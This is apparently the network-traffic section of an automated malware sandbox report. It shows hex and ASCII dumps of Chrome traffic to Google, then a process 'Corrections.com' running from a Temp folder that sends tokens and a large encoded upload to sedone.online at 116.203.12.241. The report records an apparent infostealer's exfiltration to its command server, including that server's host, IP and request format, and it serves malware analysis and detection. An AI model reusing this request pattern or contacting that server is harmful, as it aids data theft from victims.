2024-12-15 19:47:47 UTC	1303	IN	Data Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
2024-12-15 19:47:47 UTC	329	IN	Data Raw: 31 34 32 0d 0a 2c 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 31 22 2c 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 32 22 5d 2c 22 6d 65 6e 75 5f 70 6c 61 63 65 68 6f 6c 64 65 72 5f 6c 61 62 65 6c 22 3a 22 6d 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 32 39 31 2c 33 37 30 30 39 34 39 2c 33 37 30 31 33 38 34 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 Data Ascii: 142,"left_product_control-label1","left_product_control-label2"],"menu_placeholder_label":"menu-content","metadata":{"bar_height":60,"experiment_id":[3700291,3700949,3701384],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_acces
2024-12-15 19:47:47 UTC	1390	IN	Data Raw: 38 30 30 30 0d 0a 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 5c 75 30 30 33 64 74 68 69 73 3b 5c 6e 74 72 79 7b 5c 6e 5f 2e 43 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 21 61 2e 6a 29 69 66 28 63 20 69 6e 73 74 61 6e 63 65 6f 66 20 41 72 72 61 79 29 66 6f 72 28 76 61 72 20 64 20 6f 66 20 63 29 5f 2e 43 64 28 61 2c 62 2c 64 29 3b 65 6c 73 65 7b 64 5c 75 30 30 33 64 28 30 2c 5f 2e 7a 29 28 61 2e 43 2c 61 2c 62 29 3b 63 6f 6e 73 74 20 65 5c 75 30 30 33 64 61 2e 76 2b 63 3b 61 2e 76 2b 2b 3b 62 2e 64 61 74 61 73 65 74 2e 65 71 69 64 5c 75 30 30 33 64 65 3b 61 2e 42 5b 65 5d 5c 75 30 30 33 64 64 3b 62 5c 75 30 30 32 36 5c 75 30 30 32 36 62 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 62 2e 61 64 64 Data Ascii: 8000nction(_){var window\u003dthis;\ntry{\n_.Cd\u003dfunction(a,b,c){if(!a.j)if(c instanceof Array)for(var d of c)_.Cd(a,b,d);else{d\u003d(0,_.z)(a.C,a,b);const e\u003da.v+c;a.v++;b.dataset.eqid\u003de;a.B[e]\u003dd;b\u0026\u0026b.addEventListener?b.add
2024-12-15 19:47:47 UTC	1390	IN	Data Raw: 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 7d 7d 3b 5f 2e 4f 64 5c 75 30 30 33 64 6e 65 77 20 5f 2e 4e 64 28 5c 22 61 62 6f 75 74 3a 69 6e 76 61 6c 69 64 23 7a 43 6c 6f 73 75 72 65 7a 5c 22 29 3b 5f 2e 4b 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 6e 68 5c 75 30 30 33 64 61 7d 7d 3b 5f 2e 50 64 5c 75 30 30 33 64 5b 4c 64 28 5c 22 64 61 74 61 5c 22 29 2c 4c 64 28 5c 22 68 74 74 70 5c 22 29 2c 4c 64 28 5c 22 68 74 74 70 73 5c 22 29 2c 4c 64 28 5c 22 6d 61 69 6c 74 6f 5c 22 29 2c 4c 64 28 5c 22 66 74 70 5c 22 29 2c 6e 65 77 20 5f 2e 4b 64 28 61 5c 75 30 30 33 64 5c 75 Data Ascii: dclass{constructor(a){this.i\u003da}toString(){return this.i}};_.Od\u003dnew _.Nd(\"about:invalid#zClosurez\");_.Kd\u003dclass{constructor(a){this.nh\u003da}};_.Pd\u003d[Ld(\"data\"),Ld(\"http\"),Ld(\"https\"),Ld(\"mailto\"),Ld(\"ftp\"),new _.Kd(a\u003d\u
2024-12-15 19:47:47 UTC	1390	IN	Data Raw: 6e 74 29 7b 6c 65 74 20 63 2c 64 3b 62 5c 75 30 30 33 64 28 64 5c 75 30 30 33 64 28 63 5c 75 30 30 33 64 5c 22 64 6f 63 75 6d 65 6e 74 5c 22 69 6e 20 62 3f 62 2e 64 6f 63 75 6d 65 6e 74 3a 62 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 29 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 64 2e 63 61 6c 6c 28 63 2c 60 24 7b 61 7d 5b 6e 6f 6e 63 65 5d 60 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 5c 22 5c 22 3a 62 2e 6e 6f 6e 63 65 7c 7c 62 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5c 22 6e 6f 6e 63 65 5c 22 29 7c 7c 5c 22 5c 22 7d 3b 5c 6e 5f 2e 65 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 5c 75 30 30 33 64 5f 2e 50 61 28 61 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 Data Ascii: nt){let c,d;b\u003d(d\u003d(c\u003d\"document\"in b?b.document:b).querySelector)\u003d\u003dnull?void 0:d.call(c,`${a}[nonce]`);return b\u003d\u003dnull?\"\":b.nonce\|\|b.getAttribute(\"nonce\")\|\|\"\"};\n_.ee\u003dfunction(a){var b\u003d_.Pa(a);return b\u00
2024-12-15 19:47:47 UTC	1390	IN	Data Raw: 65 78 74 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 63 6c 61 73 73 5c 22 3f 61 2e 63 6c 61 73 73 4e 61 6d 65 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 66 6f 72 5c 22 3f 61 2e 68 74 6d 6c 46 6f 72 5c 75 30 30 33 64 63 3a 6f 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 64 29 3f 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 6f 65 5b 64 5d 2c 63 29 3a 5f 2e 6a 65 28 64 2c 5c 22 61 72 69 61 2d 5c 22 29 7c 7c 5f 2e 6a 65 28 64 2c 5c 22 64 61 74 61 2d 5c 22 29 3f 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 64 2c 63 29 3a 61 5b 64 5d 5c 75 30 30 33 64 63 7d 29 7d 3b 6f 65 5c 75 30 30 33 64 7b 63 65 6c 6c 70 61 64 64 69 6e 67 3a 5c 22 63 65 6c 6c 50 61 64 64 69 6e 67 5c 22 2c 63 65 6c 6c 73 70 61 63 69 6e Data Ascii: ext\u003dc:d\u003d\u003d\"class\"?a.className\u003dc:d\u003d\u003d\"for\"?a.htmlFor\u003dc:oe.hasOwnProperty(d)?a.setAttribute(oe[d],c):_.je(d,\"aria-\")\|\|_.je(d,\"data-\")?a.setAttribute(d,c):a[d]\u003dc})};oe\u003d{cellpadding:\"cellPadding\",cellspacin

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49754	142.250.181.132	443	1228	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-15 19:47:46 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-15 19:47:47 UTC	933	IN	HTTP/1.1 200 OK Version: 704583840 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Sun, 15 Dec 2024 19:47:46 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-15 19:47:47 UTC	35	IN	Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-12-15 19:47:47 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49761	116.203.12.241	443	5496	C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Timestamp	Bytes transferred	Direction	Data
2024-12-15 19:47:50 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----F379R900ZU3E3EC2N7Y5 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 505 Connection: Keep-Alive Cache-Control: no-cache
2024-12-15 19:47:50 UTC	505	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 33 37 39 52 39 30 30 5a 55 33 45 33 45 43 32 4e 37 59 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 46 33 37 39 52 39 30 30 5a 55 33 45 33 45 43 32 4e 37 59 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 46 33 37 39 52 39 30 30 5a 55 33 45 33 45 43 32 4e 37 59 35 0d 0a 43 6f 6e 74 Data Ascii: ------F379R900ZU3E3EC2N7Y5Content-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------F379R900ZU3E3EC2N7Y5Content-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------F379R900ZU3E3EC2N7Y5Cont
2024-12-15 19:47:51 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 15 Dec 2024 19:47:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-15 19:47:51 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49766	116.203.12.241	443	5496	C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Timestamp	Bytes transferred	Direction	Data
2024-12-15 19:47:51 UTC	328	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----O8GVASR9H4EUAIMOP8GV User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 213453 Connection: Keep-Alive Cache-Control: no-cache
2024-12-15 19:47:51 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 38 47 56 41 53 52 39 48 34 45 55 41 49 4d 4f 50 38 47 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 4f 38 47 56 41 53 52 39 48 34 45 55 41 49 4d 4f 50 38 47 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 4f 38 47 56 41 53 52 39 48 34 45 55 41 49 4d 4f 50 38 47 56 0d 0a 43 6f 6e 74 Data Ascii: ------O8GVASR9H4EUAIMOP8GVContent-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------O8GVASR9H4EUAIMOP8GVContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------O8GVASR9H4EUAIMOP8GVCont
2024-12-15 19:47:51 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-15 19:47:51 UTC	16355	OUT	Data Raw: 41 59 69 43 78 45 41 41 51 59 42 44 51 51 49 41 77 67 49 44 51 67 49 43 41 67 4a 43 41 41 76 5a 58 64 45 74 42 69 33 43 71 41 41 41 41 59 34 6f 47 49 66 43 68 45 41 41 51 59 42 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 77 41 76 5a 58 64 45 74 42 69 33 43 59 41 41 41 41 59 66 43 52 45 41 41 51 59 42 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 67 41 76 5a 58 64 45 74 42 69 33 43 49 41 41 41 41 59 65 43 42 45 41 41 51 59 49 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 51 41 76 5a 58 64 45 74 42 69 33 45 41 41 41 42 69 49 48 45 51 41 42 42 67 45 4e 42 41 67 44 43 41 67 4e 43 41 67 49 43 41 6b 45 41 43 39 6c 5a 51 58 79 48 55 51 47 6f 41 41 41 42 67 50 73 35 42 38 47 45 51 41 42 42 67 45 4e 42 41 67 49 43 41 67 4e 43 41 67 49 43 41 6b 44 Data Ascii: AYiCxEAAQYBDQQIAwgIDQgICAgJCAAvZXdEtBi3CqAAAAY4oGIfChEAAQYBDQQICAgIDQgICAgJBwAvZXdEtBi3CYAAAAYfCREAAQYBDQQICAgIDQgICAgJBgAvZXdEtBi3CIAAAAYeCBEAAQYIDQQICAgIDQgICAgJBQAvZXdEtBi3EAAABiIHEQABBgENBAgDCAgNCAgICAkEAC9lZQXyHUQGoAAABgPs5B8GEQABBgENBAgICAgNCAgICAkD
2024-12-15 19:47:51 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-15 19:47:51 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-15 19:47:51 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-15 19:47:51 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-15 19:47:51 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-15 19:47:51 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
